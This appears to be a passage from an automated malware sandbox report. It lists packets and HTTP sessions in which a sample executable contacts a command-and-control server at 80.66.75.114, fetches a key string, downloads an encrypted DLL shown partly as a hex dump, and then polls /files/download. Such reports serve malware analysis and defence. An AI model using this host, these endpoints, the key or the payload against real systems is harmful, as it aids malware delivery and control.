                                                Oct 8, 2024 04:24:40.163130999 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.163229942 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.163275003 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.163296938 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.163311005 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.163321972 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.163363934 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.163367033 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.163407087 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.163449049 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.163496017 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.163510084 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.163537979 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.163542032 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.163588047 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.163626909 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.163634062 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.163641930 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.163769007 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.164036036 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.164079905 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.164110899 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.164132118 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.164160967 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.164170980 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.164179087 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.164226055 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.164232016 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.164278030 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.164321899 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.164321899 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.164366007 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.164377928 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.164463043 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.164906025 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.164949894 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.164951086 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.164997101 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.165026903 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.165040970 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.165055037 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.165090084 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.165096045 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.165132046 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.165139914 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.165182114 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.165185928 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.165261030 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.248826027 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.248888016 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.248945951 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.248991013 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.249012947 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.249012947 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.249012947 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.249032974 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.249038935 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.249084949 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.249116898 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.249116898 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.249131918 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.249183893 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.249197006 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.249241114 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.249259949 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.249301910 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.249311924 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.249340057 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.249365091 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.249427080 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.249468088 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.249485970 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.249531984 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.249665022 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.249809980 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.249857903 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.249891043 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.249891043 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.250273943 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.250314951 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.250324011 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.250360966 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.250363111 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.250401974 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.250410080 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.250452042 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.250456095 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.250500917 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.250541925 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.250562906 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.250607967 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.250648022 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.252156973 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.252203941 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.252207041 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.252247095 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.252249956 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.252290010 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.252294064 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.252331972 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.252340078 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.252378941 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.252379894 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.252418995 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.252696991 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.252742052 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.252785921 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.252787113 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.252825975 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.252832890 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.253145933 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.253180027 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.253180027 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.253192902 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.253241062 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.253283024 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.253283024 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.253329992 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.253329992 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.253376007 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.253420115 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.253424883 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.253463030 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.253506899 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.253519058 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.253563881 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.253606081 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.253609896 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.253652096 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.253695965 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.253696918 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.253741026 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.253741980 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.253787994 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.253833055 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.253833055 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.253880978 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.253890038 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.253926992 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.253957987 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.253969908 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.253990889 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.254050970 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.254093885 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.254096031 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.254141092 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.254184961 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.254188061 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.254232883 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.254275084 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.254276991 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.254318953 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.254323006 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.254369020 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.254410982 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.254414082 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.254460096 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:44.329477072 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:44.329687119 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:45.481673002 CEST4973880192.168.2.680.66.75.114

                                                HTTP Request Dependency Graph

                                                • 80.66.75.114

                                                HTTP Packets

                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                0192.168.2.64973880.66.75.114803212C:\Users\user\Desktop\nRGKqzVQRt.exe
                                                TimestampBytes transferredDirectionData
                                                Oct 8, 2024 04:24:09.736298084 CEST384OUTGET /name HTTP/1.1
                                                Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                User-Agent: 1
                                                Host: 80.66.75.114
                                                Connection: Keep-Alive
                                                Cache-Control: no-cache
                                                Oct 8, 2024 04:24:10.460727930 CEST210INHTTP/1.1 200 OK
                                                Date: Tue, 08 Oct 2024 02:24:10 GMT
                                                Server: Apache/2.4.52 (Ubuntu)
                                                Content-Length: 7
                                                Keep-Alive: timeout=5, max=100
                                                Connection: Keep-Alive
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 6d 69 78 6e 69 6e 65
                                                Data Ascii: mixnine
                                                Oct 8, 2024 04:24:10.502087116 CEST416OUTGET /add?substr=mixnine&s=three&sub=NOSUB HTTP/1.1
                                                Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                User-Agent: 1
                                                Host: 80.66.75.114
                                                Connection: Keep-Alive
                                                Cache-Control: no-cache
                                                Oct 8, 2024 04:24:10.739790916 CEST203INHTTP/1.1 200 OK
                                                Date: Tue, 08 Oct 2024 02:24:10 GMT
                                                Server: Apache/2.4.52 (Ubuntu)
                                                Content-Length: 1
                                                Keep-Alive: timeout=5, max=99
                                                Connection: Keep-Alive
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 30
                                                Data Ascii: 0
                                                Oct 8, 2024 04:24:10.746113062 CEST387OUTGET /dll/key HTTP/1.1
                                                Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                User-Agent: 1
                                                Host: 80.66.75.114
                                                Connection: Keep-Alive
                                                Cache-Control: no-cache
                                                Oct 8, 2024 04:24:10.963947058 CEST224INHTTP/1.1 200 OK
                                                Date: Tue, 08 Oct 2024 02:24:10 GMT
                                                Server: Apache/2.4.52 (Ubuntu)
                                                Content-Length: 21
                                                Keep-Alive: timeout=5, max=98
                                                Connection: Keep-Alive
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 39 74 4b 69 4b 33 62 73 59 6d 34 66 4d 75 4b 34 37 50 6b 33 73
                                                Data Ascii: 9tKiK3bsYm4fMuK47Pk3s
                                                Oct 8, 2024 04:24:10.969579935 CEST392OUTGET /dll/download HTTP/1.1
                                                Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                User-Agent: 1
                                                Host: 80.66.75.114
                                                Connection: Keep-Alive
                                                Cache-Control: no-cache
                                                Oct 8, 2024 04:24:11.194689035 CEST1236INHTTP/1.1 200 OK
                                                Date: Tue, 08 Oct 2024 02:24:11 GMT
                                                Server: Apache/2.4.52 (Ubuntu)
                                                Content-Disposition: attachment; filename="fuckingdllENCR.dll";
                                                Content-Length: 97296
                                                Keep-Alive: timeout=5, max=97
                                                Connection: Keep-Alive
                                                Content-Type: application/octet-stream
                                                Data Raw: 58 4d 20 a9 34 49 68 99 fe 5d 0a b3 eb 74 b6 26 d0 73 db 11 cf 76 c9 30 7b 06 76 1e 76 73 27 c0 ad eb 3a aa 6c ec 68 b4 13 95 65 19 c0 04 a4 9f 52 d6 da b1 8e f9 31 83 b8 06 72 fc 52 2b 46 6b 2a f7 94 87 96 7e f9 73 f3 a2 8e 06 fa 0b c3 51 a1 b1 0b 1e e4 72 c9 54 ac 62 d5 ed 06 c7 96 dd b1 7e 63 b2 8d 5b 1d 87 0b cf 81 a3 a5 ba ba 3b a3 fc ff 6a ac 40 e8 30 b2 25 84 88 f9 dd 19 78 dd e8 c7 76 cb 77 fb f0 2e a7 1d 3c 72 75 0a 1c 17 d3 59 72 65 3b f4 62 36 1d 14 b2 48 51 2d d4 ec ba cd 38 bf 42 b3 9b 51 82 61 a1 c0 c6 52 bc 3a cc 68 26 72 90 a0 a6 17 be fc 07 3d a2 3b 72 1e 6b e2 0b 54 e2 40 e0 ea b9 d0 e1 6c 8b cf 3b 23 fd 94 33 21 e6 4f b4 00 78 da 7d a1 13 e8 b9 03 f4 00 bb ce 79 27 3c 0a 47 66 51 90 4b af 23 d8 4c 35 76 10 1e 5d d4 b3 01 f6 db 8a 1e 18 de 64 f3 a6 e9 b9 b8 cb fe 4e 7b 65 a0 c7 bc 40 05 fa f3 1e a1 c2 e7 7f 08 cd ec 7f e9 a4 1b b2 f5 41 5c 8e 11 3c bc 74 f3 75 ed 58 15 4f ef 6e c5 e9 5a 89 8e 20 86 58 62 b1 4f 3c 84 2a 5a a5 a4 cf 68 7e 9b 28 b1 57 99 66 af 7a 0d 56 cb 34 09 db 4c [TRUNCATED]
                                                Data Ascii: XM 4Ih]t&sv0{vvs':lheR1rR+Fk*~sQrTb~c[;j@0%xvw.<ruYre;b6HQ-8BQaR:h&r=;rkT@l;#3!Ox}y'<GfQK#L5v]dN{e@A\<tuXOnZ XbO<*Zh~(WfzV4L%50H`syB(IL5s:aS}XM9Jo)'M;n6]Wn)L_e>[RA.'6N.g6IY%h 3r^\b~y/h2ZLku}V<fbD<!_2zoIEP*OuPw#6N&lR}GILYNyzjHy'_5Pd9y+6q*)GcL#5\M5U])U(~HmYG1r4BhP]iM%)q.]~|jbK!N7R}T2bsq1L^!|qD'sLnD@bn%0=bQ1+lQXO|NC.d{08F<Wy{oj3n4eS] KoBH~sh1m86{lsRq~w_;X*#U
                                                Oct 8, 2024 04:24:11.194709063 CEST1236INData Raw: 98 ce 36 6e 99 4f 44 62 54 a0 2b 5a 63 96 17 1c 8e 71 d6 10 c5 90 ce 53 f1 24 2d 53 60 59 54 cc 01 e7 c4 70 93 60 32 41 18 ce 0d 55 c7 24 07 69 64 06 3a b3 b0 e0 76 6e 84 3b d8 aa e7 9e f0 d5 ee 45 9c b1 50 a7 0a df 3f 11 c8 6e 7d 41 c9 76 d2 0f
                                                Data Ascii: 6nODbT+ZcqS$-S`YTp`2AU$id:vn;EP?n}AvLwU|}"Gi9ZIxw.sY-KnP2oWci#2kgDZ6~,o9"opx(uccgv@M)nL
                                                Oct 8, 2024 04:24:11.194730997 CEST448INData Raw: 44 70 21 ac fa dd 10 12 6c 8f df 8d 2a 52 37 0a bc 2b 32 e0 ca d2 85 4a 5e 2a bb 89 27 6f b7 ed ec 11 16 da 35 88 e8 c7 a0 fb 57 12 bc ee 7b 8e 20 56 98 d0 5f d5 fa 6e b8 a6 bb 07 ab 54 57 ec 21 3a 2e 06 6d 3f c9 25 6c 63 ce e7 5a 5e c2 32 24 bd
                                                Data Ascii: Dp!l*R7+2J^*'o5W{ V_nTW!:.m?%lcZ^2$2[#LeCe+: *rUz(-dFI?[*VH0-!{</Bge!ygJZ=XwPMeh5]Bki'\L4u
                                                Oct 8, 2024 04:24:11.194746017 CEST1236INData Raw: 94 56 6f 92 44 df 99 d0 e2 07 87 22 38 2a d1 8d 6b 3b c8 f7 e1 b5 00 e9 38 74 ca 24 b7 c2 3f 88 77 ac 79 7e 4b f0 5e 79 57 bd f5 65 c6 f8 b8 fd c0 5d 9c 70 37 a5 45 ab 76 ba a0 33 8b ee 99 a3 da 61 9a 35 1f f1 31 09 03 71 96 d5 28 76 57 11 9e 5e
                                                Data Ascii: VoD"8*k;8t$?wy~K^yWe]p7Ev3a51q(vW^RK@$V+4trcwMMZoj^}xmgu0f'US]*04<cMk2cD$g|5r_gqKgLoZ
                                                Oct 8, 2024 04:24:11.194760084 CEST1236INData Raw: 58 c0 cb 65 40 62 96 d2 c0 5a b0 40 d6 25 d6 ca ea 81 87 4f 4f 97 dc 41 ef 2a 66 64 06 53 6d 2a 3f d8 44 59 af 7a 70 c9 ee 8f c8 c1 db 27 48 69 d8 e7 8e c2 56 b7 01 bc 0b 63 45 c8 b6 b5 e2 1a ee a7 1a fe a7 05 65 86 dc c4 60 f9 00 38 79 10 46 0b
                                                Data Ascii: Xe@bZ@%OOA*fdSm*?DYzp'HiVcEe`8yF|G(^80y-`p+x@Q.QjK=s3GVBfP:}^-RuJhJHz#<6S}Cc*>:cNZNG1M4
                                                Oct 8, 2024 04:24:11.194776058 CEST448INData Raw: 97 c8 49 60 d1 46 16 fc 9d 61 11 37 f4 93 5e ed 32 7a c7 3b 41 14 16 b7 4f 84 8d 39 ca 79 46 fc 2f a4 a6 82 f3 b6 68 61 61 41 32 66 02 00 57 51 d9 b9 0a 9a 35 e2 01 f6 64 48 f1 ee 15 5c 2f c3 ce e2 74 99 ad e8 49 c0 49 83 58 d9 d9 5f 15 11 8a 28
                                                Data Ascii: I`Fa7^2z;AO9yF/haaA2fWQ5dH\/tIIX_( N%"PPLT(yFqG=)hZX.`2RsbifK!97e9f|uUsetj9L~DY)5:w<}gBO$5)iI
                                                Oct 8, 2024 04:24:11.194802046 CEST1236INData Raw: e6 69 2d 49 51 f3 a4 d5 76 b0 82 cf 74 d1 85 19 f7 42 a9 78 eb 0b e9 01 32 e4 1d 91 61 e4 92 ad 68 8b f1 01 d1 83 62 ef 0e ea 87 d8 a0 66 e2 ec 6d df dc 97 39 57 94 e3 66 5a 2b 20 d1 43 cd 8a 07 04 20 9b 76 db 4c a6 9b 12 b9 0c 46 0b 2e ee 08 fc
                                                Data Ascii: i-IQvtBx2ahbfm9WfZ+ C vLF.CXb<SK(R?X.!:YjJD^J[,x)<"kp /uTW56"An*M%b"P{$T#/6UC{XQ;,>=
                                                Oct 8, 2024 04:24:11.194814920 CEST224INData Raw: df fc 63 59 94 94 22 2e 6e b1 dd f8 1b 24 0c 47 af 41 b3 94 25 ae 63 05 68 cb 3a 78 6c 3a e6 0d fb 89 7f 8a 63 45 33 22 3e 37 2f cf bc bf dc 07 94 6d 6c 26 9b 2d c4 5a 8b a4 95 2b 63 98 62 c1 cf a5 66 8f c2 9e 15 af 99 71 41 93 5a 45 26 fd cf ad
                                                Data Ascii: cY".n$GA%ch:xl:cE3">7/ml&-Z+cbfqAZE&j;{1:w\1`gub%gi&!3h+bn,awiHeKQZXrU)DT"->KTgx;1xY6#
                                                Oct 8, 2024 04:24:11.195065022 CEST1236INData Raw: 8f 1d 0d be 27 ff ec 94 42 a9 9b 73 5a fd 79 db d2 b8 d5 e1 a1 03 e3 15 15 03 66 f7 ce 80 5c 3b 1e a1 07 3e 21 eb af c4 a1 bf 5e 61 d2 6f d8 d5 5a 17 35 09 48 2c d6 85 83 d0 04 63 f5 86 ce a6 bc c0 9e 98 c6 04 c0 ab 77 00 9a eb 84 f7 63 b7 4f 02
                                                Data Ascii: 'BsZyf\;>!^aoZ5H,cwcOVm&pNVkeZjcZK+y@qE6a_]p{@v8/|ZGTU)R_}H)8c'ATd10?lg;&j
                                                Oct 8, 2024 04:24:11.195086956 CEST224INData Raw: f5 e3 4e 22 e2 e4 6c f0 55 0b 97 5e ac 99 ce d9 2d 9d c7 be 15 93 aa 0c 29 0c 1d b2 f3 dd fc e4 8b 63 d6 98 31 d1 b7 49 a6 71 e5 b2 d3 e8 5e e8 9e 75 46 fe 01 39 b7 33 37 2e e3 ef 91 41 d9 99 68 ea 7f 7d cf ce 41 81 6e 70 c3 0d 68 96 71 2a a3 c4
                                                Data Ascii: N"lU^-)c1Iq^uF937.Ah}Anphq*lT>|kg#q*)!.dpdL^_i]Tkf^=KqnBf'Jk+&Y&rTb_Ed(iiwM3mo.m
                                                Oct 8, 2024 04:24:11.195468903 CEST1236INData Raw: 34 ba a9 d6 80 6d a5 ac 9f d3 80 17 6f 02 df fe 4e 07 6d 30 c4 90 a4 8c 39 6b a3 a1 85 ab b3 ca 01 2d d7 3a ac 7a 54 7a bd ef a4 a1 a0 91 1e 78 f5 95 ac ec 47 63 7c 55 62 3c 14 a6 7c 59 c1 c9 3e 15 2e 8a 92 0f cc 20 54 75 23 66 b3 9f f4 b5 a1 18
                                                Data Ascii: 4moNm09k-:zTzxGc|Ub<|Y>. Tu#f-UM!+g@!4<fG7IkEl#=Jdr;)\b?kkdx-<lO!2NY!8hiq[Awyw:uw%}i=M
                                                Oct 8, 2024 04:24:11.481280088 CEST394OUTGET /files/download HTTP/1.1
                                                Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                User-Agent: C
                                                Host: 80.66.75.114
                                                Connection: Keep-Alive
                                                Cache-Control: no-cache
                                                Oct 8, 2024 04:24:11.708328009 CEST203INHTTP/1.1 200 OK
                                                Date: Tue, 08 Oct 2024 02:24:11 GMT
                                                Server: Apache/2.4.52 (Ubuntu)
                                                Content-Length: 1
                                                Keep-Alive: timeout=5, max=96
                                                Connection: Keep-Alive
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 30
                                                Data Ascii: 0
                                                Oct 8, 2024 04:24:13.850475073 CEST394OUTGET /files/download HTTP/1.1
                                                Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                User-Agent: C
                                                Host: 80.66.75.114
                                                Connection: Keep-Alive
                                                Cache-Control: no-cache
                                                Oct 8, 2024 04:24:14.076299906 CEST203INHTTP/1.1 200 OK
                                                Date: Tue, 08 Oct 2024 02:24:13 GMT
                                                Server: Apache/2.4.52 (Ubuntu)
                                                Content-Length: 1
                                                Keep-Alive: timeout=5, max=95
                                                Connection: Keep-Alive
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 30
                                                Data Ascii: 0
                                                Oct 8, 2024 04:24:16.100605011 CEST394OUTGET /files/download HTTP/1.1
                                                Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                User-Agent: C
                                                Host: 80.66.75.114
                                                Connection: Keep-Alive
                                                Cache-Control: no-cache
                                                Oct 8, 2024 04:24:16.322865963 CEST203INHTTP/1.1 200 OK
                                                Date: Tue, 08 Oct 2024 02:24:16 GMT
                                                Server: Apache/2.4.52 (Ubuntu)
                                                Content-Length: 1
                                                Keep-Alive: timeout=5, max=94
                                                Connection: Keep-Alive
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 30
                                                Data Ascii: 0
                                                Oct 8, 2024 04:24:18.334892035 CEST394OUTGET /files/download HTTP/1.1
